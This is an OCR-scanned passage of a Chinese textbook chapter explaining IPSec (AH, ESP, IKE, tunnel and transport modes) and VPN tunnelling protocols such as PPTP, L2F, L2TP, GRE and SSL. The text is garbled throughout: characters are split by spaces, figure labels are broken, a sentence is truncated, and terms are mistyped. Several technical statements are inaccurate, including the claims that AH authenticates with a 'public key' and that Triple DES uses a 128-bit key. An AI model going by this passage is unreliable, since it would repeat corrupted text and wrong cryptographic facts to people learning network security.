(4) 应 用 透明 的 安全 性 (Application-transparent Security) : IPSec 的 安全 头 搬 和 人 在 标 
准 的 IJP 头 和 上 层 协议 (如 TCP) 之 间 , 任 何 网 络 服务 和 网 络 应 用 可 以 不 经 修改 地 从 标准 IP 
转向 IPSec, 同 时 IPSec 通信 也 可 以 透明 地 通过 现 有 的 IP 路 由 器 。 

1. IP 安全 体系 结构 

IPSec 实际 上 是 一 套 协议 包 而 不 是 一 个 单个 的 协议 ,这 一 点 对 于 我 们 认识 IPsec 是 很 重 
要 的 ,其 体系 结构 由 以 下 8 部 分 组 成 。 

(1) 体系 结构 (Architecture) : 包含 了 总 体 的 概念 、 安 全 需求 和 定义 IPSec 技术 的 机 制 。 

(2) 认证 头 (Authentication Header, AH): 包含 与 使 用 AH 进行 包 身 份 验证 相关 的 包 
格式 和 一 般 性 问题 。 

(3) 封装 安全 载荷 (Encapsulating Security Payload,ESP): 使 用 ESP 进行 包 加 密 的 报 
文 格式 和 一 般 性 问题 ,以 及 可 选 的 认证 。 

(4) 加 密 算法 (Encapsulation Algorithm): 描述 各 种 加 密 算法 如 何 用 于 ESP 的 一 组 

(5) 认证 算法 (Authentication Algorithm): 描述 各 种 身份 验证 算法 如 何 用 于 AH 和 
ESP 身份 验证 选项 的 一 组 文档 。 

(6) 密 钥 管理 (Key Management) : 说 明 密 钥 管 理 方案 的 一 组 文档 。 

(7) 解释 域 (Domain of Interpretation,DoI) : 包含 彼此 相关 的 其 他 文档 需要 的 值 ,包括 
被 认可 的 加 密 和 身份 验证 算法 的 标识 符 以 及 运作 参数 ,如 密 钥 生存 周期 等 。 

(8) 策略 (Policy) : 决定 两 个 实体 之 间 能 和 否 通信 ,以 及 如 何 进行 通信 。 

策略 的 核心 由 3 部 分 组 成 : SA、SAD、SPD。SA( 安 全 关联 ) 表 示 了 策略 实施 的 具体 细 
节 , 包 括 源 /目的 地 址 、 应 用 协议 ,SPI(Security Parameter Index, 安 全 参数 索引 ,IPSec 协议 
基本 概念 之 一 ,是 一 个 32b 的 数值 ,在 每 一 个 IPSec 报 文中 都 携带 该 值 ,SPI\IP 目的 地 址 、 
安全 协议 号 三 者 结合 起 来 共同 构成 一 个 三 元 组 ,来 唯一 标识 一 个 特定 的 安全 联盟 )、 所 用 算 
法 / 密 钥 /长 度 ; SAD 为 进入 和 外 出 包 处 理 维持 一 个 活动 的 SA 列表 ; SPD 决定 了 整个 
VPN 的 安全 需求 。 策 略 部 分 是 唯一 尚未 成 为 标准 的 组 件 。 对 于 上 述 协议 的 支持 ,在 IPv6 
中 是 强制 的 ,在 IPv4 中 是 可 选 的 。 认 证 的 扩展 包头 称 为 AH 头 , 加 密 的 扩展 包头 称 为 
ESP 头 。 

IPSec 由 AH 协议 .ESP 协议 和 IKE 组 成 。 

(1) AH 协议 用 于 数据 源 认 证 和 数据 完整 性 认证 ,可 以 证 明 数 据 的 起 源 地 、 保 障 数据 的 
完整 性 以 及 防止 相同 数据 包 在 Internet 中 重播 。 

(2) ESP 协议 具有 所 有 AH 的 功能 ,还 可 以 利用 加 密 技 术 保障 数据 机 密 性 。 

显然 AH 和 ESP 都 可 以 提供 身份 认证 ,但 它们 也 有 区 别 。 首 先 ESP 要 求 使 用 高 强度 
的 加 密 算法 ,会 受到 许多 限制 ; 其 次 ,在 多 数 情况 下 ,使 用 AH 的 认证 服务 已 能 满足 要 求 , 相 
对 来 说 ,ESP 开销 较 大 。 
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有 两 套 不 同 的 安全 协议 意味 着 可 以 对 IPSec 网 络 进行 更 细 粒 度 的 控制 ,选择 安全 方案 
时 可 以 有 更 大 的 灵活 度 。AH 和 ESP 可 以 单独 使 用 ,也 可 以 一 起 使 用 。 为 了 更 好 地 保证 系 
统 的 安全 性 ,建议 同时 使 用 。 

(3) Internet 密 钥 交换 协议 (Internet Key Exchange,IKE) 协 议 用 于 生成 和 分 发 在 AH 
和 ESP 中 使 用 的 密 钥 ,IKE 也 对 远程 系统 进行 初始 认证 。 

2. 安全 隧道 的 建立 

IPSec 通过 上 述 3 个 基本 协议 在 IP 包头 后 增加 新 的 字段 来 实现 安全 保证 。 

(1) AH 包头 可 以 保证 信息 源 的 可 靠 性 和 数据 的 完整 性 。AH 验证 包头 如 图 5-1 所 示 ， 
首先 发 送 方 将 IP 包头 ,高 层 的 数据 和 公共 密 钥 这 3 部 分 通过 某 种 Hash 算法 进行 计算 ,得 
出 AH 包头 中 的 验证 数据 ,并 将 AH 包头 加 入 数据 包 中 ; 当 数 据 传输 到 接收 方 时 ,接收 方 将 
收 到 的 IP 包头 数据、 公共 密 钥 以 相同 的 Hash 算法 进行 运算 ,并 把 得 出 的 结果 同 收 到 的 数 
据 包 中 的 AH 包头 进行 比较 ; 如 果 结 果 相 同 则 表明 数据 在 传输 过 程 中 没有 被 修改 ,并 且 是 
从 真正 的 信息 源 处 发 出 的 。 因 为 公共 密 钥 和 Hash 算法 就 可 以 保证 这 些 。 

原由 数据 包 | ”IP 头 高 层 协 议 数据 
密 角 


by Hash 算 法 
增加 AH 头 后 的 “(MD5 或 SHA1) 


数据 包 [ Ip | AH 高 层 协议 数据 























5-1 AH 验证 包头 


信息 源 的 可 靠 性 可 以 通过 公共 密 钥 来 保证 。IPSec 认证 头 提供 了 数据 完整 性 和 数据 源 
验证 ,但 是 不 提供 保密 服务 。AH 包含 了 对 称 密 钥 的 Hash 函数 ,使 得 第 三 方 无 法 修改 传输 
中 的 数据 。IPSec 支持 下 面 的 认证 算法 : 

。 HMAC-MD5(HMAC-Message Digest 5)128b 密 钥 。 

。 HMAC-SHAI1(Hashed Message Authentication Code-Secure Hash Algorithm 1) 

160b 密 钥 。 

这 些 算 法 有 两 个 共同 的 特点 : 第 一 个 是 不 可 能 从 计算 结果 推导 出 它 的 原始 输入 数据 ， 
第 二 个 是 不 可 能 从 给 定 的 一 组 数据 及 其 经 过 Hash 算法 计算 出 的 结果 推导 出 另外 一 组 数据 
产生 的 结果 。 

MD5 是 单 向 数学 函数 , 它 可 以 对 输入 的 数据 进行 运算 ,产生 代表 该 数据 的 128b 指纹 信 
息 。 在 这 种 方式 下 ,MD5 提供 完整 性 服务 。128b 指纹 信息 可 以 在 信息 发 送 之 前 和 数据 接 
收 之 后 计算 出 来 。 如 果 两 次 计算 结果 相同 ,那么 数据 在 传输 过 程 中 就 没有 被 改变 。SHA1 
与 MD5 类 似 ,只 是 它 产生 160b 指纹 信息 ,所 以 运算 时 间 比 MD5 稍 长 ,安全 性 更 高 一 些 。 
当 HMAC 和 MD5 共同 使 用 时 ,可 以 对 每 64B 的 数据 进行 运算 ,得 出 16B 的 指纹 信息 ,并 放 
人 AH 包头 中 。 

(2) AH 由 于 没有 对 用 户 数 据 进行 加 密 , 所 以 黑客 使 用 协议 分 析 仪 照样 可 以 窃取 在 网 
络 中 传输 的 敏感 信息 ,所 以 我 们 使 用 封装 安全 载荷 (ESP) 协 议 把 需要 保护 的 用 户 数 据 进 行 
加 密 , 并 放 到 IP 包 中 ,ESP 提供 数据 的 完整 性 、 可 靠 性 。ESP 协议 非常 灵活 ,可 以 选择 多 种 
加 密 算法 ,包括 DES、Triple DES( 三 重 DES) .RC4、RC5、IDEA 和 Blowfish。 


第 5 章 IP 安全 与 Web 安全 183 





DES 是 最 常用 的 加 密 算 法 ,其 特点 是 采用 56b 的 密 钥 ,处 理 64b 的 输入 ,加 密 解 密使 用 
同一 个 密 钥 或 可 以 相互 推导 出 来 。DES 把 数据 分 成 长 度 为 64b 的 数据 块 ,其 中 8b 作为 奇 
偶 校 验 , 有 效 码 长 为 56b。 由 于 计算 机 性 能 的 提高 ,采用 多 台 高 性 能 服务 器 可 以 攻破 56b 
DES, 所 以 Triple DES 出 现 了 , 它 采 用 128b 密 钥 提高 了 安全 性 。 

IDEA 算法 采用 128b 密 钥 ,每 次 加 密 一 个 64b 的 数据 块 。RC5 算法 中 数据 块 的 大 小 、 
密 钥 的 大 小 和 循环 次 数 都 是 可 变 的 , 密 钥 甚至 可 以 扩充 到 2048b, 具有 极 高 的 安全 性 。 
Blowfish 算法 使 用 变 长 的 密 钥 ,长度 可 达 448b, 运 行 速度 很 快 。 

以 上 算法 均 要 使 用 一 个 由 通信 各 方 共享 的 密 钥 ,被 称 作 对 称 密码 算法 。 接 收 方 只 有 使 
用 发 送 方 用 来 加 密 数据 的 密 钥 才能 解密 ,所 以 其 安全 性 依赖 于 密 钥 的 安全 。 


5.1.2 IPSec 的 工作 方式 


IPSec 有 两 种 工作 方式 : 隧道 方式 和 传输 方式 。 在 隧道 方式 中 ,整个 用 户 的 IP 数据 包 
被 用 来 计算 ESP 包头 ,整个 IP 包 被 加 密 并 和 ESP 包头 一 起 被 封装 在 一 个 新 的 了 P 包 内 。 这 
样 当 数据 在 Internet 上 传送 时 ,真正 的 源 地 址 和 目的 地 址 被 隐藏 起 来 。 隧 道 方式 数据 包 如 
图 5-2 所 示 。 


原始 IP 数 据 包 格式 





IP 头 高 层 协议 数据 








隧道 方 式 数据 包 格式 
新 的 IP 头 | CR 全 外国 | [区 IP 头 | 高层 协 议 数 所 


L 加 密 部 分 



































图 5-2 隧道 方式 数据 包 


在 传输 方式 中 ,只 有 高 层 协议 (TCP、UDP、ICMP 等 ) 及 数据 进行 加 密 , 如 图 5-3 所 示 。 
在 这 种 方式 下 , 源 地 址 、 目 的 地 址 以 及 所 有 IP 包头 的 内 容 都 不 加 密 。 


原始 IP 数 据 包 格 式 





正 头 高 层 协议 数据 








传输 方式 数据 包 格 式 





IPSec 包头 
新 的 IP 头 A 高 层 协议 数据 

















加 密 部 分 
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图 5-3 传输 方式 数据 包 





由 于 对 称 密 钥 存在 着 许多 问题 , 密 钥 传递 时 容易 泄密 。 网 络 通信 时 如 果 网 内 用 户 采 用 
同样 的 密 钥 ,就 失去 了 保密 的 意义 。 但 如 果 任 意 两 个 用 户 通 信 时 都 使 用 互 不 相同 的 密 钥 ,N 
个 人 就 要 使 用 N X(N 一 1)/2 个 密 钥 , 密 钥 量 太 大 ,在 实际 使 用 中 无 法 实现 ,所 以 在 IPSec 中 
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使 用 非 对 称 密 钥 技术 ,将 加 密 和 解密 的 密 钥 分 开 , 并 且 不 可 能 从 其 中 一 个 推导 出 另外 一 个 。 
采用 非 对 称 密 钥 技术 后 ,每 一 个 用 户 都 有 一 对 选 定 的 密 钥 : 一 个 由 用 户 自己 保存 ,一 个 可 以 
公开 得 到 。 它 的 好 处 在 于 密 钥 分 配 简单 ,由 于 加 密 和 解密 的 密 钥 互 不 相同 并 且 无 法 互相 推 
导 , 所 以 加 密 的 密 钥 可 以 分 发 给 各 个 用 户 ,而 解密 密 钥 由 用 户 自 己 保存 。 这 样 一 来 , 密 钥 保 
存量 少 ,N 个 用 户 通信 最 多 只 需 保 存 N 对 密 钥 ,便于 管理 ,可 以 满足 不 同 用 户 间 通 信 的 私密 
性 ,完成 数字 签名 和 数字 鉴别 。 目 前 有 许多 种 非 对 称 密 钥 算法 ,其 中 有 的 适用 于 密 钥 分 配 ， 
有 的 适用 于 数字 签名 。 

IPSec 中 的 AH 和 ESP 实际 上 只 是 加 密 的 使 用 者 ,为 保证 通信 的 双方 可 以 互相 信任 ,并 
采用 相同 的 加 密 算法 ,IETF 制定 了 IKE 用 于 通信 双方 进行 身份 认证 .协商 加 密 算法 和 
Hash 算法 、 生 成 公 钥 。 

在 IPSec 的 具体 实现 中 ,我 们 采用 密 钥 管理 协议 (ISAKMP Oakley) , 密 钥 交换 采用 
DiffieHellman 协议 ,身份 认证 采用 数字 签名 和 公开 密 钥 。 

IPSec 不 仅 可 以 保证 隧道 的 安全 ,同时 还 有 一 整套 保证 用 户 数据 安全 的 措施 ,利用 它 建 
立 起 来 的 隧道 更 具 安全 性 和 可 靠 性 。IPSec 还 可 以 和 L2TP、GRE 等 其 他 隧道 协议 一 同 使 
用 ,给 用 户 提 供 更 大 的 灵活 性 和 可 靠 性 。 此 外 ,IPSec 可 以 运行 于 网 络 的 任意 一 部 分 , 它 可 
以 运行 在 路 由 器 和 防火 墙 之 间 、 路 由 器 和 路 由 器 之 间 、PC 和 服务 器 之 间 、PC 和 拨号 访问 设 
备 之 间 。 当 IPSec 运行 于 路 由 器 /网 关 时 ,安装 配置 简单 ,只 需 在 网 络 设备 上 进行 配置 ,由 网 
络 提供 安全 性 ; 当 IPSec 运行 于 服务 器 /PC 时 ,可 以 提供 端 到 端的 安全 ,在 应 用 层 进行 控 
制 ,但 它 的 缺点 是 安装 配置 和 管理 比较 复杂 。 在 实际 应 用 中 ,可 以 根据 用 户 的 需求 选择 相应 
的 方式 。 


5.2 VPN 技术 


5.2.1 VPN 的 基本 原理 


虚拟 专用 网 (Virtual Private Network,VPN) 就 是 建立 在 公用 网 上 的 、 由 某 一 组 织 或 某 
一 群 用 户 专用 的 通信 网 络 , 其 虚拟 性 表现 在 任意 一 对 VPN 用 户 之 间 没 有 专用 的 物理 连接 ， 
而 是 通过 ISP 提供 的 公用 网 络 来 实现 通信 ,其 专用 性 表现 在 VPN 之 外 的 用 户 无 法 访问 
VPN 内 部 的 网 络 资源 ,VPN 内 部 用 户 之 间 可 以 实现 安全 通信 。 

虚拟 专用 网 的 作用 : 

(1) 帮助 远程 用 户 、 公 司 分 支 机 构 、 商 业 伙伴 及 供应 商 与 公司 的 内 部 网 建立 可 信 的 安全 
连接 ,并 保证 数据 的 安全 传输 。 

(2) 用 于 不 断 增 长 的 移动 用 户 的 全 球 Internet 接 入 ,以 实现 安全 连接 。 

(3) 用 于 实现 企业 网 站 之 间 安 全 通信 的 虚拟 专用 线路 。 

(4) 用 于 经 济 有 效 地 连接 到 商业 伙伴 和 用 户 的 安全 外 联网 的 虚拟 专用 网 。 

实现 VPN 的 关键 技术 有 下 面 几 种 。 

(1) 隧道 技术 (Tunneling Technology): 通过 将 待 传输 的 原始 信息 经 过 加 密 和 协议 封 
装 处 理 后 再 上 能 套装 人 另 一 种 协议 的 数据 包 送 入 网 络 中 , 像 普通 数据 包 一 样 进行 传输 。 经 过 
这 样 的 处 理 , 只 有 源 端 和 目的 端的 用 户 对 隧道 中 的 骨 套 信息 进行 解释 和 处 理 , 而 对 于 其 他 用 
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户 而 言 只 是 无 意义 的 信息 。 这 里 采用 的 是 加 密 和 信息 结构 变换 相 结合 的 方式 ,而 非 单纯 的 
加 密 技术 。 

(2) 加 解密 技术 (Encryption & Decryption): VPN 可 以 利用 已 有 的 加 解密 技术 实现 保 
密 通 信 ,保证 公司 业务 和 个 人 通信 的 安全 。 

(3) 密 钥 管理 技术 (Key Management) : 建立 隧道 和 保密 通信 都 需要 密 钥 管理 技术 的 
支撑 , 密 钥 管理 负责 密 钥 的 生成 分 发 .控制 和 跟踪 ,以 及 验证 密 钥 的 真实 性 等 。 

(4) 身份 认证 技术 (Authentication) : 在 正式 的 隧道 连接 开始 之 前 需要 确认 用 户 的 身 
份 ,以 便 系统 进一步 实施 资源 访问 控制 或 用 户 授权 (Authorization) 。 身 份 认 证 技术 是 相对 
比较 成 熟 的 一 类 技术 ,因此 可 以 考虑 对 现 有 技术 的 集成 。 

VPN 的 解决 方案 有 以 下 3 种 ,可 以 根据 实际 情况 具体 选择 使 用 。 

(1) 内 联网 VPN(Intranet VPN): 企业 内 部 虚拟 局 域 网 也 叫 内 联网 VPN ,用 于 实现 企 
业内 部 各 个 LAN 之 间 的 安全 互联 。 越 来 越 多 的 企业 需要 在 全 国 乃 至 世界 范围 内 建立 各 种 
办 事 机 构 ,分 公司 ,研究 所 等 ,各 个 分 公司 之 间 传 统 的 网 络 连接 方式 一 般 是 租用 专线 。 显 然 ， 
在 分 公司 增多 .业务 开展 越 来 越 广泛 时 ,网 络 结构 趋 于 复杂 ,费用 昂贵 。 利 用 VPN 特性 可 
以 在 Internet 上 组 建 世界 范围 内 的 Intranet VPN。 利 用 Internet 的 线路 保证 网 络 的 互联 
性 ,而 利用 隧道 ,加 密 等 VPN 特性 可 以 保证 信息 在 整个 Intranet VPN 上 安全 传输 。 
Intranet VPN 通过 一 个 使 用 专用 连接 的 共享 基础 设施 ,连接 企业 总 部 .远程 办 事 处 和 分 支 
机 构 。 企 业 拥 有 与 专用 网 络 的 相同 政策 ,包括 安全 .服务 质量 (QoS) .可 管理 性 和 可 靠 性 。 
如 图 5-4 所 示 。 

(2) 外 联网 VPN(Extranet VPN) : 企业 外 部 虚拟 专用 网 也 叫 外 联网 VPN ,用 于 实现 企 
业 与 客户 ,供应 商 和 其 他 相关 团体 之 间 的 互联 和 互通。 当然 ,客户 也 可 以 通过 Web 访问 企业 
的 客户 资源 ,但 是 外 联网 VPN 方式 可 以 方便 地 提供 接 人 控制 和 身份 认证 机 制 , 动 态 地 提供 
公司 业务 和 数据 的 访问 权限 。 如 果 公 司 提供 B2B 之 间 的 安全 访问 服务 , 则 可 以 考虑 
Extranet VPN。 如 图 5-5 所 示 。 
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(3) 远程 接 入 VPN(Access VPN): 解决 远程 用 户 访问 企业 内 部 网 络 问题 的 传统 方法 
是 采用 长 途 拨号 方式 接 入 企业 的 网 络 访问 服务 器 (NAS)。 如 果 企业 的 内 部 人 员 移 动 或 有 
远程 办 公 需 要 ,或 者 商家 要 提供 B2C 的 安全 访问 服务 ,就 可 以 考虑 使 用 Access VPN。 
Access VPN 通过 一 个 拥有 与 专用 网 络 相同 策略 的 共享 基础 设施 ,提供 对 企业 内 部 网 或 外 
部 网 的 远程 访问 。Access VPN 能 使 用 户 随时 随地 以 其 所 需 的 方式 访问 企业 资源 。Access 
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VPN 包括 拨号 ISDN 数字 用 户 线路 (xDSL) ,移动 IP 和 电缆 技术 ,能 够 安全 地 连接 移动 用 
户 、 远 程 工作 者 或 分 支 机 构 。 如 图 5-6 所 示 。Access VPN 适用 于 公司 内 部 经 常 有 流动 人 员 


远程 办 公 的 情况 。 
公司 总 部 用 户 


5.2.2 VPN 隧道 技术 


VPN 具体 实现 是 采用 隧道 技术 ,将 企业 网 的 数据 封装 在 隧道 中 进行 传输 。 隧 道 协议 可 
分 为 第 二 层 隧道 协议 PPTP、L2F、L2TP 和 第 三 层 隧道 协议 GRE、IPSec。 它 们 的 本 质 区 别 
在 于 用 户 的 数据 包 是 被 封装 在 哪 种 数据 包 中 在 隧道 中 传输 的 。 

1. 第 二 层 隧道 协议 (L2TP) 

无 论 哪 种 隧道 协议 都 是 由 传输 的 载体 、 不 同 的 封装 格式 以 及 被 传输 数据 包 组 成 的 。 下 
面 以 第 二 层 隧道 协议 (Layer 2 Tunneling Protocol,L2TP) 为 例 , 来 了 解 隧道 协议 的 组 成 。 

如 图 5-7 所 示 ,传输 协议 被 用 来 传送 封装 协议 。 
IP 是 一 种 常见 的 传输 协议 ,这 是 因为 IP 具有 强大 的 
路 由 选择 能 力 , 可 以 运行 于 不 同 媒体 上 ,并 且 其 应 用 
最 为 广泛 。 此 外 , 帧 中 继 、ATM 的 PVC 和 SVC 也 图 57 L2TP 数据 包 在 也 网 中 的 封装 
是 非常 合适 的 传输 协议 。 比 如 用 户 想 通过 Internet 
将 其 分 公司 网 络 连接 起 来 ,但 他 的 网 络 环境 是 IPX, 这 时 用 户 就 可 以 使 用 IP 作为 传输 协议 
通过 封装 协议 封装 IPX 的 数据 包 , 然 后 就 可 以 在 Internet 上 传递 IPX 数据 。 封 装 协议 被 用 
来 建立 保持 和 拆卸 隧道 。 而 承载 协议 是 被 封装 的 协议 ,它们 可 以 是 PPP 或 者 SLIP。 

隧道 协议 有 很 多 好 处 ,例如 在 拨号 网 络 中 ,用 户 大 都 接受 ISP 分 配 的 动态 IP 地 址 ,而 企 
业 网 一 般 均 采用 防火 墙 `NAT 等 安全 措施 来 保护 自己 的 网 络 , 企 业 员工 通过 ISP 拨号 上 网 
时 就 不 能 穿 过 防火 墙 访问 企业 内 部 网 资源 。 采 用 隧道 协议 后 ,企业 拨号 用 户 就 可 以 得 到 企 
业内 部 网 IP 地 址 ,通过 对 PPP 帧 进行 封装 ,用 户 数 据 包 可 以 穿 过 防火 墙 到 达 企 业内 部 网 。 

2. 点 对 点 隧道 协议 (PPTP) 

PPTP( Point-to-Point Tunneling Protocol) 是 由 Microsoft、Ascend 等 公司 组 成 的 
PPTP 论坛 在 1996 年 定义 的 第 二 层 隧道 协议 。PPTP 提供 PPTP 客户 机 和 PPTP 服务 器 
之 间 的 加 密 通信 。PPTP 客户 机 是 指 运行 该 协议 的 PC,PPTP 服务 器 是 指 运 行 该 协议 的 服 
务 器 。PPTP 可 看 作 是 PPP 协议 的 一 种 扩展 。 它 提供 了 一 种 在 Internet 上 建立 多 协议 的 安 
全 虚拟 专用 网 (VPN) 的 通信 方式 。 远 端 用 户 能 够 通过 任何 支持 PPTP 的 ISP 访问 公司 的 
专用 网 络 。 

通过 PPTP, 客 户 可 采用 拨号 方式 接 入 公共 IP 网 络 Internet。 拨 号 客户 首先 按 常规 方 
式 拨 号 到 ISP 的 接 入 服务 器 (NAS) ,建立 PPP 连接 ; 在 此 基础 上 ,客户 进行 二 次 拨号 建立 





图 5-6 Access VPN 
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到 PPTP 服务 器 的 连接 ,该 连接 称 为 PPTP 隧道 ,实质 上 是 基于 IP 协议 上 的 另 一 个 PPP 连 
接 , 其 中 的 IP 包 可 以 封装 多 种 协议 数据 ,包括 TCP/IP、IPX 和 NetBEUI。PPTP 采用 了 基 
于 RSA 公司 RC4 的 数据 加 密 方 法 .保证 了 虚拟 连接 通道 的 安全 性 。 对 于 直接 连 到 Internet 
上 的 客户 则 不 需要 第 一 重 PPP 的 拨号 连接 ,可 以 直接 与 PPTP 服务 器 建立 虚拟 通道 。 
PPTP 把 建立 隧道 的 主动 权 交 给 了 用 户 ,但 用 户 需 要 在 其 PC 上 配置 PPTP, 这 样 做 既 增 加 
了 用 户 的 工作 量 又 会 造成 网 络 安全 隐患 。 另 外 ,PPTP 只 支持 IP 作为 传输 协议 。 

3. 第 二 层 转 发 协议 (L2F) 

第 二 层 转发 协议 (Layer 2 Forwarding Protocol,L2F) 是 由 Cisco 公司 提出 的 可 以 在 多 
种 媒体 如 ATM、 帧 中 继 、IP 网 上 建立 多 协议 的 安全 虚拟 专用 网 (VPN) 的 通信 方式 。L2F 隧 
道 如 图 5-8 所 示 。 远 端 用 户 能 够 通过 任何 拨号 方式 接 人 公共 IP 网 络 , 首 先 按 常规 方式 拨号 
到 ISP 的 接 入 服务 器 (NAS) ,建立 PPP 连接 ; NAS 根据 用 户 名 等 信息 ,发 起 第 二 重 连接 , 通 
向 家 庭 网 关 HGW 服务 器 。 在 这 种 情况 下 隧道 的 配置 和 建立 对 用 户 是 完全 透明 的 。 

4. 第 二 层 隧道 协议 (L2TP) 

L2TP 结合 了 L2F 和 PPTP 的 优点 ,可 以 让 用 户 从 客户 端 或 访问 服务 器 端 发 起 VPN 
连接 。L2TP 是 把 链 路 层 PPP 帧 封装 在 公共 网 络 设施 如 IP、.ATM、 帧 中 继 中 进行 隧道 传输 
的 封装 协议 。 

Cisco、Ascend、Microsoft 和 RedBack 公司 的 专家 们 在 修改 了 十 几 个 版 本 后 ,在 1999 年 
8 月 公布 了 L2TP 的 标准 RFC2661。 

目前 用 户 在 拨号 访问 Internet 时 ,必须 使 用 IP 协议, 并且 其 动态 得 到 的 IP 地 址 也 是 合 
法 的 。L2TP 的 好 处 就 在 于 支持 多 种 协议 ,用 户 可 以 保留 原 有 的 IPX、Appletalk 等 协议 或 
公司 原 有 的 IP 地 址 。L2TP 隧道 如 图 5-8 所 示 。L2TP 还 解决 了 多 个 PPP 链 路 的 拥 绑 问 
题 ,PPP 链 路 捆绑 要 求 其 成 员 均 指向 同一 个 NAS,L2TP 可 以 使 物理 上 连接 到 不 同 NAS 的 
PPP 链 路 ,在 逻辑 上 的 终 节 点 为 同一 个 物理 设备 。L2TP 扩展 了 PPP 连接 ,在 传统 方式 中 ， 
用 户 通 过 模拟 电话 线 或 ISDNVADSL 与 网 络 访问 服务 器 (NAS) 建 立 一 个 第 二 层 的 连接 ,并 
在 其 上 运行 PPP, 第 二 层 连接 的 终 节点 和 PPP 会 话 的 终 节点 在 同一 个 设备 上 (如 NAS)。 
L2TP 作为 PPP 的 扩展 提供 了 更 强大 的 功能 ,包括 第 二 层 连接 的 终 节点 和 PPP 会 话 的 终 节 
点 可 以 是 不 同 的 设备 。 
LAC 
NAS 






图 5-8 ”L2F/L2TP 隧道 


L2TP 主要 由 LAC(L2TP Access Concentrator) 和 LNS(L2TP Network Server) 构 成 ， 
LAC(L2TP 访问 集中 器 ) 支 持 客户 端的 L2TP, 它 用 于 发 起 呼叫 ,接收 呼叫 和 建立 隧道 ; 


是 LAC,L2TP 使 得 PPP 协议 的 终点 延伸 到 LNS。 
L2TP 的 建立 过 程 是 : 
(1) 用 户 通过 公共 电话 网 或 ISDN 拨号 至 本 地 的 接 入 服务 器 LAC,LAC 接收 呼叫 并 进 
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行 基本 的 辨别 ,这 一 过 程 可 以 采用 几 种 标准 ,如 域名 .呼叫 线路 识别 (CLID) 或 拨号 ID 业务 
(DNIS) 等 。 

(2) 当 用 户 被 确认 为 合法 企业 用 户 时 ,就 建立 一 个 通 向 LNS 的 拨号 VPN 隧道 。 

(3) 企业 内 部 的 安全 服务 器 (如 RADIUS) 鉴 定 拨号 用 户 。 

(4) LNS 与 远程 用 户 交换 PPP 信息 ,分 配 IP 地 址 。LNS 可 采用 企业 专用 地 址 (未 注册 
的 IP 地 址 ) 或 服务 提供 商 提供 的 地 址 空间 分 配 IP 地 址 。 因 为 内 部 源 IP 地 址 与 目的 地 IP 
地 址 实际 上 都 通过 服务 提供 商 的 IP 网 络 在 PPP 信息 包 内 传送 ,企业 专用 地 址 对 提供 者 的 
网 络 是 透明 的 。 

(5) 端 到 端的 数据 从 拨号 用 户 传 到 LNS。 

在 实际 应 用 中 ,LAC 将 拨号 用 户 的 PPP 帧 封装 后 ,传送 到 LNS,LNS 去 掉 封 装 包 头 , 得 
到 PPP 帧 ,再 去 掉 PPP 帧 头 ,得 到 网 络 层 数 据 包 。 

L2TP 这 种 方式 给 服务 提供 商 和 用 户 带 来 了 许多 好 处 。 用 户 不 需要 在 PC 上 安装 专门 
的 客户 端 软件 ,企业 可 以 使 用 未 注册 的 IP 地 址 ,并 在 本 地 管理 认证 数据 库 , 从 而 降低 了 使 用 
成 本 和 培训 维护 费用 。 

与 PPTP 和 L2F 相 比 ,L2TP 的 优点 之 一 是 提供 了 差错 和 流量 控制 ; 另 一 个 优点 是 
L2TP 使 用 UDP 封装 和 传送 PPP 帧 。 面 向 非 连接 的 UDP 无 法 保证 网 络 数据 的 可 靠 传输 ， 
L2TP 使 用 Nr( 下 一 个 希望 接收 的 消息 序列 号 ) 和 Ns( 当 前 发 送 的 数据 包 序列 号 ?字段 控 制 
流量 和 差错 。 双 方 通过 序列 号 来 确定 数据 包 的 次 序 和 缓冲 区 ,一 旦 数据 丢失 ,根据 序列 号 可 
以 进行 重 发 。 

作为 PPP 的 扩展 ,L2TP 支持 标准 的 安全 特性 CHAP 和 PAP, 可 以 进行 用 户 身 份 认 
证 。L2TP 定义 了 控制 包 的 加 密 传输 ,每 个 被 建立 的 隧道 生成 一 个 独一无二 的 随机 密 钥 ,以 
便 抵抗 欺骗 性 的 攻击 ,但 是 它 对 传输 中 的 数据 并 不 加 密 。 

5. 通用 路 由 封装 (GRE) 

通用 路 由 封装 (Generic Routing Encapsulation, GRE) 在 RFC1701/RFC1702 中 定义 ， 
它 规定 了 怎样 用 一 种 网 络 层 协议 去 封装 另 一 种 网 络 层 协议 的 方法 。GRE 的 隧道 由 两 端的 
源 IP 地 址 和 目的 IP 地 址 来 定义 , 它 允 许 用 户 使 用 IP 封装 IP、IPX 和 AppleTalk 等 协议 ,并 
支持 全 部 的 路 由 协议 ,如 RIP.OSPF IGRP、EIGRP。 通 过 GRE, 用 户 可 以 利用 公共 IP 网 
络 连接 IPX 网 络 `,AppleTalk 网 络 ,还 可 以 使 用 保留 地 址 进行 网 络 互联 ,或 者 对 公 网 隐藏 企 
业 网 的 IP 地 址 。GRE 只 提供 了 数据 包 的 封装 , 它 并 没有 加 密 功 能 来 防止 网 络 侦 听 和 攻击 。 
所 以 在 实际 环境 中 它 常 和 IPSec 在 一 起 使 用 ,由 IPSec 提供 用 户 数据 的 加 密 , 从 而 给 用 户 提 
供 更 好 的 安全 性 。 

6. 安全 套 接 字 层 (SSL) 

安全 套 接 字 层 (Secure Socket Layer,SSL) 是 Netscape 公司 于 1994 年 开发 的 传输 层 安 
全 协议 ,目的 是 保护 HTTP 协议 ,实现 Web 安全 通信 。 但 是 这 个 协议 本 身 可 以 保护 任何 一 
种 基于 TCP 协议 的 应 用 。 基 于 SSL 也 可 以 构建 VPN ,因为 SSL 在 Socket 层 上 实施 安全 措 
施 , 因 此 它 可 以 针对 具体 的 应 用 实施 安全 保护 ,目前 应 用 最 多 的 就 是 利用 SSL 实现 对 Web 
应 用 的 保护 。 

在 应 用 服务 器 前 面 需 要 部 署 一 台 SSL 服务 器 , 它 负责 接 人 各 个 分 布 的 SSL 客户 端 。 这 
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种 应 用 模式 也 是 SSL 主要 的 应 用 模式 ,类 似 于 IPSec VPN 中 的 Access VPN 模式 ,如 果 企 
业 分 布 的 网 络 环境 下 只 有 这 种 基于 C/S 或 B/S 架构 的 应 用 ,不 要 求 各 分 支 机 构 之 间 的 计算 
机 能 够 相互 访问 , 则 可 以 选择 利用 SSL 构建 简单 的 VPN。 具 备 这 种 应 用 模式 的 企业 有 证 
券 公司 为 股民 提供 的 网 上 炒股 、 金 融 系 统 的 网 上 银行 、 中 小 企业 的 ERP 等 。 

基于 SSL 的 VPN 部 署 起 来 非常 简单 ,只 需要 一 台 服 务 器 和 若干 客户 端 软件 。 

7. 多 协议 标签 交换 (MPLS) 

